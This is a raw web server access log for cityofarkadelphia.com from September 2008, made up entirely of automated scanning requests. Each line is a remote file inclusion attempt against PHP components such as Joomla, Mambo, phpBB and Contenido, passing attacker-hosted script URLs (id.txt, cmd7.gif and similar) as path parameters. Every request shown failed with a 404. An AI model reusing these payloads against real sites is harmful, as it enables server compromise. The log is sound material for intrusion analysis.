193.178.228.12 - - [01/Sep/2008:01:56:31 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:01:56:39 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:56:53 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:56:53 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:56:53 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:57:02 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:57:02 -0700] "GET //config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:57:02 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:57:12 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:57:20 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:01:59:04 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:01:59:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:01:59:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:02:02:38 -0700] "GET /logs/access_080329.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:02:02:39 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:02:02:39 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:25 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:25 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:25 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:38 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:38 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:38 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:38 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:38 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:05:38 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:02:07:22 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
212.50.0.218 - - [01/Sep/2008:02:07:22 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:08:38 -0700] "GET /logs/access.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:08:39 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:08:42 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:09:47 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:09:47 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:09:47 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:02:09:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:02:09:52 -0700] "GET //config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:02:09:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:02:10:28 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.130.79.78 - - [01/Sep/2008:02:11:16 -0700] "GET /logs/access_080201.log//components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
201.130.79.78 - - [01/Sep/2008:02:11:16 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
201.130.79.78 - - [01/Sep/2008:02:11:16 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:11:30 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:11:36 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:11:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:02:16:49 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:02:16:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:18:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:18:05 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:18:15 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:18:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:18:46 -0700] "GET /logs/access_080329.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:18:49 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
201.130.79.78 - - [01/Sep/2008:02:19:44 -0700] "GET /logs/access_071231.log//components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:19:59 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:20:08 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:20:08 -0700] "GET /logs/access_080329.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:20:08 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:02:20:13 -0700] "GET /errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
211.239.162.41 - - [01/Sep/2008:02:21:29 -0700] "GET /logs/access.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:02:22:03 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:22:22 -0700] "GET /logs/access_080201.log/admin/editor2/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:22:22 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:22:23 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
190.83.18.253 - - [01/Sep/2008:02:25:00 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "cityofarkadelphia.com"
190.83.18.253 - - [01/Sep/2008:02:25:09 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "cityofarkadelphia.com"
190.83.18.253 - - [01/Sep/2008:02:25:09 -0700] "GET //config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:25:58 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:25:58 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:25:59 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:26:30 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:02:27:23 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:28:04 -0700] "GET /logs/access.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
211.239.162.41 - - [01/Sep/2008:02:28:14 -0700] "GET /logs/access_080101.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
211.239.162.41 - - [01/Sep/2008:02:29:07 -0700] "GET /logs/access_071101.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:29:49 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:29:49 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:29:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:29:49 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.85.91.156 - - [01/Sep/2008:02:30:30 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.85.91.156 - - [01/Sep/2008:02:30:31 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.85.91.156 - - [01/Sep/2008:02:30:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:31:02 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:31:43 -0700] "GET //config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:31:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:31:43 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:31:43 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:32:56 -0700] "GET /logs/access.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:02:33:08 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:02:33:09 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:02:33:10 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:33:41 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:02:34:25 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:02:34:25 -0700] "GET //config/dbutil.bck.php?confdir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:02:34:25 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:02:34:56 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
59.125.5.1 - - [01/Sep/2008:02:35:35 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
59.125.5.1 - - [01/Sep/2008:02:35:35 -0700] "GET //config/dbutil.bck.php?confdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
59.125.5.1 - - [01/Sep/2008:02:35:36 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
59.125.5.1 - - [01/Sep/2008:02:35:58 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:02:36:14 -0700] "GET /logs/access_080329.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:02:36:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:02:36:15 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:02:37:11 -0700] "GET //config/dbutil.bck.php?confdir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:02:37:11 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:02:37:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:02:37:23 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:02:40:45 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
